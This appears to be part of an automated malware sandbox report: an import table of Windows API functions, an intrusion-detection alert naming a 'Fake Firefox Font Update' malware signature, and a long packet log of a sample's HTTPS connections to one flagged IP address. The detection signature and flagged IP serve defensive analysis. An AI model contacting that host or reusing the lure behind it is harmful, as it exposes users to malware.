                                                                                                                kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, IsCharLowerA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                gdi32.dllUnrealizeObject, StretchBlt, StartPage, StartDocA, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, EndPage, EndDoc, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                                version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProfileStringA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                                                kernel32.dllSleep
                                                                                                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                winspool.drvOpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter
                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                EnglishUnited States
                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-11-26T08:13:00.554575+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705198.252.105.91443TCP
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Nov 26, 2024 08:12:59.205281019 CET49704443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:12:59.205336094 CET44349704198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:12:59.205420971 CET49704443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:12:59.205624104 CET49704443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:12:59.205674887 CET44349704198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:12:59.205733061 CET49704443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:12:59.251653910 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:12:59.251691103 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:12:59.251755953 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:12:59.253295898 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:12:59.253314018 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:00.554485083 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:00.554574966 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:00.725619078 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:00.725651026 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:00.726003885 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:00.766648054 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:00.811110973 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:00.851325989 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.164844990 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.213340998 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.357304096 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.357316971 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.357371092 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.357386112 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.357409000 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.357422113 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.357451916 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.357470989 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.357546091 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.401490927 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.401510000 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.401608944 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.401637077 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.401685953 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.451678038 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.451703072 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.451807976 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.451843977 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.451894045 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.575824976 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.575869083 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.575999022 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.576023102 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.576073885 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.604923010 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.604942083 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.605074883 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.605097055 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.605145931 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.630100965 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.630121946 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.630258083 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.630290031 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.630343914 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.756248951 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.756273985 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.756395102 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.756407022 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.756455898 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.777868986 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.777890921 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.777957916 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.777987003 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.778004885 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.778031111 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.799153090 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.799175978 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.799240112 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.799259901 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.799403906 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.817595005 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.817615986 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.817687035 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.817708969 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.817751884 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.838861942 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.838897943 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.838943958 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.838968039 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.838995934 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.839004993 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.942296028 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.942331076 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.942410946 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.942425013 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.942473888 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.956950903 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.956974983 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.957098007 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.957115889 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.957165956 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.972062111 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.972095013 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.972256899 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.972256899 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.972275972 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.972315073 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.986757994 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.986780882 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.986841917 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.986857891 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:01.986872911 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:01.986896992 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.000430107 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.000449896 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.000529051 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.000539064 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.000550032 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.000576019 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.015228033 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.015250921 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.015328884 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.015337944 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.015373945 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.027924061 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.027949095 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.028023005 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.028033018 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.028069973 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.042556047 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.042586088 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.042644978 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.042654037 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.042692900 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.132498026 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.132529974 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.132647991 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.132677078 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.132715940 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.141904116 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.141927958 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.142046928 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.142066002 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.142102957 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.152020931 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.152044058 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.152138948 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.152157068 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.152209997 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.161731005 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.161753893 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.161848068 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.161864042 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.161978006 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.170429945 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.170461893 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.170521975 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.170538902 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.170551062 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.170582056 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.179553032 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.179573059 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.179646969 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.179665089 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.179708004 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.188287973 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.188309908 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.188380003 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.188395023 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.188405991 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.188430071 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.196610928 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.196635008 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.196693897 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.196712017 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.196747065 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.322552919 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.322586060 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.322685957 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.322700977 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.322740078 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.322783947 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.328449965 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.328474045 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.328551054 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.328561068 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.328596115 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.328622103 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.338613033 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.338635921 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.338710070 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.338722944 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.338762999 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.342221975 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.342246056 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.342331886 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.342344046 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.342375994 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.348525047 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.348546028 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.348612070 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.348623991 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.348675966 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.355520964 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.355542898 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.355607033 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.355617046 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.355654955 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.361615896 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.361639023 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.361697912 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.361709118 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.361745119 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.368490934 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.368511915 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.368568897 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.368582964 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.368618965 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.513696909 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.513734102 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.513847113 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.513870955 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.513914108 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.519630909 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.519651890 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.519717932 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.519726992 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.519762039 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.526494980 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.526515007 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.526576042 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.526587009 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.526612043 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.526631117 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.533293009 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.533318996 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.533387899 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.533397913 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.533436060 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.539772034 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.539788961 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.539853096 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.539861917 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.539897919 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.546681881 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.546698093 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.546763897 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.546771049 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.546806097 CET49705443192.168.2.5198.252.105.91
                                                                                                                Nov 26, 2024 08:13:02.552779913 CET44349705198.252.105.91192.168.2.5
                                                                                                                Nov 26, 2024 08:13:02.552795887 CET44349705198.252.105.91192.168.2.5
